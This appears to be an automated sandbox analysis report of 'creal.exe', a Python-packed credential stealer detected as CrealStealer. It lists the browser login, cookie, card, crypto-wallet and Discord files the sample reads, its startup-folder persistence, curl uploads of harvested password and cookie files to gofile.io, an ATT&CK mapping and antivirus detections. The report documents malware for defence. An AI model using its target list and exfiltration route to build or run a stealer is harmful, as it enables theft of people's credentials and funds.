            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pyd VolumeInformation
            Source: C:\Windows\System32\curl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\crpasswords.txt VolumeInformation
            Source: C:\Windows\System32\curl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\crcookies.txt VolumeInformation
            Source: C:\Windows\System32\curl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\crcreditcards.txt VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\certifi VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Code function: 0_2_00007FF67A60C560 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF67A60C560
            Source: C:\Users\user\Desktop\creal.exe Code function: 0_2_00007FF67A626470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF67A626470
            Source: C:\Windows\System32\curl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /Electrum/walletsz
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Binance.exez5/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldbz
            Source: creal.exe, 00000002.00000003.1553243827.00000185BC88E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: creal.exe, 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb5
            Source: creal.exe, 00000002.00000003.1553243827.00000185BC88E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\creal.exe File opened: C:\Users\user\AppData\Local\Discord
            Source: C:\Users\user\Desktop\creal.exe File opened: C:\Users\user\AppData\Local\DiscordCanary
            Source: C:\Users\user\Desktop\creal.exe File opened: C:\Users\user\AppData\Local\DiscordPTB
            Source: C:\Users\user\Desktop\creal.exe File opened: C:\Users\user\AppData\Local\DiscordDevelopment
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\Discord
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\DiscordCanary
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\DiscordPTB
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe File opened: C:\Users\user\AppData\Local\DiscordDevelopment
            Source: Yara match File source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR
            Source: Yara match File source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7004EC0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,_Py_Dealloc,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyExc_DeprecationWarning,PyErr_WarnFormat,PyList_GetItem,PyObject_CallOneArg,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,2_2_00007FF8E7004EC0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E70050DD PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,2_2_00007FF8E70050DD
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7006B74 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,2_2_00007FF8E7006B74
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83A6B74 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,28_2_00007FF8F83A6B74
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83A4EC0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,_Py_Dealloc,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyExc_DeprecationWarning,PyErr_WarnFormat,PyList_GetItem,PyObject_CallOneArg,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,28_2_00007FF8F83A4EC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83A50DD PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,28_2_00007FF8F83A50DD
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Windows Management Instrumentation (11); Native API (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: Registry Run Keys / Startup Folder (12); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (12); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Timestomp (1); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: System Time Discovery (2); Security Software Discovery (31); Virtualization/Sandbox Evasion (1); Process Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (25)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: Encrypted Channel (21); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            [Behavior graph] Behavior Graph ID: 1592536, Sample: creal.exe, Startdate: 16/01/2025, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            creal.exe | 79% | Virustotal | | Browse
            creal.exe | 75% | ReversingLabs | Win64.Trojan.CrealStealer |
            creal.exe | 100% | Avira | TR/Spy.Agent.zopbs |
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            store4.gofile.io | 31.14.70.245 | true | false | | high
            s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
            api.ipify.org | 104.26.13.205 | true | false | | high
            geolocation-db.com | 159.89.102.253 | true | false | | high
            api.gofile.io | 45.112.123.126 | true | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://api.gofile.io/getServer | false | | high
            https://api.ipify.org/ | false | | high
            https://store4.gofile.io/uploadFile | false | | high
                                                                    high
                                                                    https://coinbase.com)zcreal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercreal.exe, 00000002.00000002.1554436074.00000185B9850000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548117141.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508417882.00000185B9846000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1546008995.00000185B984A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1547899486.00000185B984F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548377923.00000185B986D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508816820.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1551754192.00000185B986E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1554656745.00000185B986F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
